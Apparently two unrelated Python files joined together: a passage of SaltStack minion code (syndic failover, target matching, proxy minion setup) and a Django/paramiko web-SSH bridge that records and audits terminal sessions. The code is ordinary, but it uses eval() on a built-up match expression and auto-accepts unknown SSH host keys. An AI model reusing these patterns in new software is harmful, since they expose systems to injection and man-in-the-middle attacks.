self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
        # if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
        '''
        Wrapper to call '_return_pub_multi' on a syndic, best effort to get
        the one you asked for
        '''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
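        # yield the preferred master first, then fall through the remaining
        # masters in (possibly shuffled) order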
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
    '''
    Used to evaluate matching calls from the master
    '''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
                        if results[-1] not in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
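        # e.g. tgt "webserv* and G@os:Debian" has each sub-matcher evaluated to
        # the string 'True' or 'False', producing something like "True and False"
        # for the eval() below to reduce to the final boolean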
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
        '''
        Function to finish init after connecting to a master.
        This is primarily loading modules, pillars, etc. (since they need
        to know which master they connected to).
        If this function is changed, please check Minion._post_master_init
        to see if those changes need to be propagated.
        ProxyMinions need a significantly different post master setup,
        which is why the differences are not factored out into separate helper
        functions.
        '''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id '+self.opts['id']+'. '+\
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['environment'])
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
        # add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv=self.opts['environment'])
self.grains_cache = self.opts['grains']
self.ready = True
|
ssh.py
|
import paramiko
from threading import Thread
from .tools import get_key_obj
from asgiref.sync import async_to_sync
import socket
from django.conf import settings
import json
import time
import sys
import os
import traceback
from util.tool import gen_rand_char, res as save_res
from util.control import remove_control_chars
from mp_readline import mp_readline
import re
import logging
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
try:
    terminal_expiry_time = settings.CUSTOM_TERMINAL_EXIPRY_TIME
except Exception:
    terminal_expiry_time = 60 * 30
# sz
zmodemszstart = b'**\x18B00000000000000\r\x8a\x11'
zmodemszend = b'**\x18B0800000000022d\r\x8a'
# rz
zmodemrzstart = b'**\x18B0100000023be50\r\x8a\x11' # rz
zmodemrzestart = b'**\x18B0100000063f694\r\x8a\x11' # rz -e
zmodemrzsstart = b'**\x18B0100000223d832\r\x8a\x11' # rz -S
zmodemrzesstart = b'**\x18B010000026390f6\r\x8a\x11' # rz -e -S
zmodemrzend = b'**\x18B0800000000022d\r\x8a'
# zmodem cancel
zmodemcancel = b'\x18\x18\x18\x18\x18\x08\x08\x08\x08\x08'
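# The byte strings above are zmodem hex headers (ZPAD ZPAD ZDLE 'B' followed by
# hex-encoded type/flags/CRC) that sz/rz emit when a transfer starts, ends or is
# cancelled; spotting them in the raw channel stream toggles the binary
# pass-through mode implemented in websocket_to_django below.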
BufferSize = 4096  # 4096 is enough; larger values cause errors during zmodem transfers
class SSH:
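    '''
    Bridge a Django Channels websocket to a paramiko SSH channel: forward
    keystrokes to the remote shell, relay output back to the browser, record
    the session as an asciicast, and reconstruct the commands that were typed.
    '''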
def __init__(self, websocker, message):
self.websocker = websocker
self.message = message
        self.cmd = ''  # accumulated record of fully processed command lines
        self.cmd_tmp = ''  # the current, not-yet-processed command line
self.res = ''
self.start_time = time.time()
tmp_date1 = time.strftime("%Y-%m-%d", time.localtime(int(self.start_time)))
tmp_date2 = time.strftime("%Y%m%d%H%M%S", time.localtime(int(self.start_time)))
if not os.path.isdir(os.path.join(settings.RECORD_ROOT, tmp_date1)):
os.makedirs(os.path.join(settings.RECORD_ROOT, tmp_date1))
self.res_file = settings.RECORD_DIR + '/' + tmp_date1 + '/' + 'webssh_' + \
tmp_date2 + '_' + gen_rand_char(16) + '.txt'
self.last_save_time = self.start_time
self.res_asciinema = []
self.zmodem = False
self.zmodemOO = False
mp_readline.TESTING = True
self.rl = mp_readline.MpReadline()
        self.tab_mode = False  # when tab completion is used, the echoed data must be read back and appended to the current input command
self.history_mode = False
        self.enter = False  # whether Enter (\r) was sent; when True, the data returned by the SSH server decides whether a command was executed or text was being edited
self.ctrl_z = False
self.ctrl_c = False
    # term may be ansi, linux, vt100, xterm or dumb; all but dumb support color output
def connect(self, host, user, password=None, ssh_key=None, port=22, timeout=30,
term='xterm', pty_width=80, pty_height=24):
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if ssh_key:
key = get_key_obj(paramiko.RSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.DSSKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.ECDSAKey, pkey_obj=ssh_key, password=password) or \
get_key_obj(paramiko.Ed25519Key, pkey_obj=ssh_key, password=password)
ssh_client.connect(username=user, hostname=host, port=port, pkey=key, timeout=timeout)
else:
ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
transport = ssh_client.get_transport()
self.channel = transport.open_session()
self.channel.get_pty(term=term, width=pty_width, height=pty_height)
self.channel.invoke_shell()
            # If the socket connection has no data exchange within the given time it is
            # dropped: reading the channel raises an exception when nothing is returned
            # within the timeout. Note that a program that blocks the terminal without
            # producing output is also disconnected once this timeout is exceeded.
            self.channel.settimeout(terminal_expiry_time)  # 30 minutes by default
self.res_asciinema.append(
json.dumps(
{
"version": 2,
"width": 250, # 设置足够宽,以便播放时全屏不至于显示错乱
"height": 40,
"timestamp": int(self.start_time),
"env": {"SHELL": "/bin/sh", "TERM": term}
}
)
)
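            # res_asciinema accumulates an asciicast v2 recording: the JSON
            # header above followed by [delay, 'o', output] event triples,
            # periodically flushed to res_file via save_res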
for i in range(2):
recv = self.channel.recv(4096).decode('utf-8')
self.message['status'] = 0
self.message['message'] = recv
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.res += recv
delay = round(time.time() - self.start_time, 6)
self.res_asciinema.append(json.dumps([delay, 'o', recv]))
            # start a thread to forward data returned by the server to the Django websocket (one thread is enough)
Thread(target=self.websocket_to_django).start()
except Exception:
            logger.error(traceback.format_exc())
self.message['status'] = 2
            self.message['message'] = 'Connection failed...'
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.websocker.close(3001)
def resize_pty(self, cols, rows):
self.channel.resize_pty(width=cols, height=rows)
def su_root(self, superuser, superpassword, wait_time=1):
self.django_to_ssh('su - {0}\n'.format(superuser))
time.sleep(wait_time)
try:
self.channel.send('{}\n'.format(superpassword))
except Exception:
            logger.error(traceback.format_exc())
self.close()
def django_to_ssh(self, data):
try:
self.channel.send(data)
if not self.zmodem and not self.zmodemOO:
                if data == '\r':  # Enter: decide from the server's response whether this was a command; this style of detection means commands cannot truly be blocked (absolute blocking is a false premise anyway)
if self.cmd_tmp.strip() != '':
self.enter = True
                elif data.encode() == b'\x07':  # bell
pass
                elif data == '\t' or data.encode() == b'\x1b':  # \x1b: pressing Esc twice also triggers completion
self.tab_mode = True
elif data.encode() == b'\x1b[A' or data.encode() == b'\x1b[B':
self.history_mode = True
                elif data.encode() == b'\x03':  # e.g. ctrl+v then ctrl+c after typing a command needs two presses to cancel
self.ctrl_c = True
elif data.encode() == b'\x1a': # ctrl + z
self.ctrl_z = True
else:
self.cmd_tmp += data
except Exception:
logger.error(traceback.format_exc())
self.close()
def django_bytes_to_ssh(self, data):
try:
self.channel.send(data)
        except Exception:
logger.error(traceback.format_exc())
self.close()
def websocket_to_django(self):
try:
while 1:
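                # After a completed sz download the sender emits a final 'OO'
                # ("over and out"); read those two bytes separately so they are
                # forwarded raw instead of being decoded as terminal output.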
if self.zmodemOO:
self.zmodemOO = False
x = self.channel.recv(2)
if not len(x):
return
if x == b'OO':
self.websocker.send(bytes_data=x)
continue
else:
x += self.channel.recv(BufferSize)
else:
x = self.channel.recv(BufferSize)
if not len(x):
return
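                # While a zmodem transfer is active, watch the raw stream for
                # the end/cancel frames and pass everything through to the
                # browser untouched.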
if self.zmodem:
if zmodemszend in x or zmodemrzend in x:
self.zmodem = False
if zmodemszend in x:
self.zmodemOO = True
if zmodemcancel in x:
self.zmodem = False
self.channel.send('\n')
self.websocker.send(bytes_data=x)
else:
if zmodemszstart in x or zmodemrzstart in x or zmodemrzestart in x or zmodemrzsstart in x \
or zmodemrzesstart in x:
self.zmodem = True
self.websocker.send(bytes_data=x)
else:
try:
data = x.decode('utf-8')
                        except UnicodeDecodeError:  # a Chinese character in UTF-8 takes 3 bytes and may be cut off mid-sequence; read more and re-join
try:
x += self.channel.recv(1)
data = x.decode('utf-8')
except UnicodeDecodeError:
try:
x += self.channel.recv(1)
data = x.decode('utf-8')
except UnicodeDecodeError:
logger.error(traceback.format_exc())
                                    data = x.decode('utf-8', 'ignore')  # still failing after two re-joins means the data is garbled; force the conversion
self.message['status'] = 0
self.message['message'] = data
self.res += data
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
delay = round(time.time() - self.start_time, 6)
self.res_asciinema.append(json.dumps([delay, 'o', data]))
                        # persist once after a set number of entries, a set number of seconds, or a set memory footprint
if len(self.res_asciinema) > 2000 or int(time.time() - self.last_save_time) > 60 or \
sys.getsizeof(self.res_asciinema) > 20971752:
tmp = list(self.res_asciinema)
self.res_asciinema = []
self.last_save_time = time.time()
save_res(self.res_file, tmp)
if self.enter:
self.enter = False
if not data.startswith("\r\n"): # 回车后结果不以\r\n开头的肯定不是命令
self.cmd_tmp = ''
else:
                                if re.match(rb'^\r\n\s+\x1b.*$', x):  # Enter in vi edit mode when the terminal is a colour type such as xterm or linux
self.cmd_tmp = ''
                                # elif x == b'\r\n':  # todo: vi on a file in normal mode returns \r\n; Enter in vi edit mode on a dumb terminal also returns \r\n
                                #     self.cmd_tmp = ''
                                else:  # record the real command; rl does not support Chinese commands
cmd_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(time.time())))
cmd = self.rl.process_line(self.cmd_tmp.encode("utf-8"))
                                    if cmd is None:  # the rl library may return None; retry once
mp_readline.TESTING = True
self.rl = mp_readline.MpReadline()
cmd = self.rl.process_line(self.cmd_tmp.encode("utf-8"))
if cmd:
self.cmd += cmd_time + "\t" + remove_control_chars(cmd) + '\n'
else:
if cmd is None:
logger.error("recv from server: {} \nerror command: {}".format(x, self.cmd_tmp.encode("utf-8")))
self.cmd += cmd_time + "\t" + remove_control_chars(self.cmd_tmp) + '\n'
self.cmd_tmp = ''
else:
                            if self.tab_mode:  # todo: still has compatibility issues
self.tab_mode = False
if x == b'\x07':
pass
tmp = data.split(' ')
                                # match only when tab completion returns a single candidate
if len(tmp) == 2 and tmp[1] == '' and tmp[0] != '':
self.cmd_tmp = self.cmd_tmp + tmp[0].encode().replace(b'\x07', b'').decode()
                                elif len(tmp) == 1 and tmp[0].encode() != b'\x07':  # \x07 is the bell
self.cmd_tmp = self.cmd_tmp + tmp[0].encode().replace(b'\x07', b'').decode()
                            # repeatedly pressing up/down to search history may return data containing \x1b[1P, which rl cannot parse; the exact cause was not investigated
if self.history_mode:
self.history_mode = False
if x != b'' and x != b'\x07':
x = re.sub(rb'\x1b\[\d+P', b'', x)
self.cmd_tmp += x.decode("utf-8")
                            if self.ctrl_c:  # cancel the command
self.ctrl_c = False
# if x == b'^C\r\n':
if re.match(rb'^\^C\r\n[\s\S]*$', x) or re.match(rb'^\r\n[\s\S]*$', x):
self.cmd_tmp = ""
if self.ctrl_z:
self.ctrl_z = False
if re.match(rb'^[\s\S]*\[\d+\]\+\s+Stopped\s+\S+[\s\S]*$', x):
self.cmd_tmp = ""
except socket.timeout:
self.message['status'] = 1
            self.message['message'] = 'Connection closed after a long period with no activity or no data returned!'
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.close(send_message=False)
except Exception:
logger.info(traceback.format_exc())
self.close()
def close(self, send_message=True):
try:
if send_message:
self.message['status'] = 1
self.message['message'] = 'Connection closed...'
message = json.dumps(self.message)
if self.websocker.send_flag == 0:
self.websocker.send(message)
elif self.websocker.send_flag == 1:
async_to_sync(self.websocker.channel_layer.group_send)(self.websocker.group, {
"type": "chat.message",
"text": message,
})
self.websocker.close()
self.channel.close()
except Exception:
# logger.error(traceback.format_exc())
pass
def shell(self, data):
        # The original author sent data to ssh by spawning a thread per call, one character
        # at a time; no thread is needed and calling the function directly performs better.
        # Thread(target=self.django_to_ssh, args=(data,)).start()
        self.django_to_ssh(data)
        # If the thread that forwards data to the django websocket were created here, every
        # character typed on the client would spawn a new thread.
        # Thread(target=self.websocket_to_django).start()
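
# --- Illustrative sketch (not part of the original class) ---
# The UnicodeDecodeError retries in websocket_to_django() exist because a
# UTF-8 character can span several bytes and recv() may split it across
# reads. A minimal standalone version of the same idea, assuming `read(n)`
# returns up to n more bytes from the stream:
def decode_stream_chunk(chunk, read, max_extra=3):
    """Decode chunk, pulling at most max_extra bytes to complete a
    truncated multi-byte sequence; fall back to lossy decoding."""
    for _ in range(max_extra):
        try:
            return chunk.decode('utf-8')
        except UnicodeDecodeError:
            chunk += read(1)  # one more byte may complete the sequence
    try:
        return chunk.decode('utf-8')
    except UnicodeDecodeError:
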